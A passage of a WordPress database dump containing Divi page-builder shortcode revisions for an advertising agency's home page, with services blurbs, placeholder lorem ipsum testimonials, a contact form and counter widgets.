make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-06 20:50:13','2020-07-06 20:50:13','',134,'https://52.66.212.87/2020/07/06/134-revision-v1/',0,'revision','',0),(254,1,'2020-07-06 20:56:10','2020-07-06 20:56:10','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency.An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving Big Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" 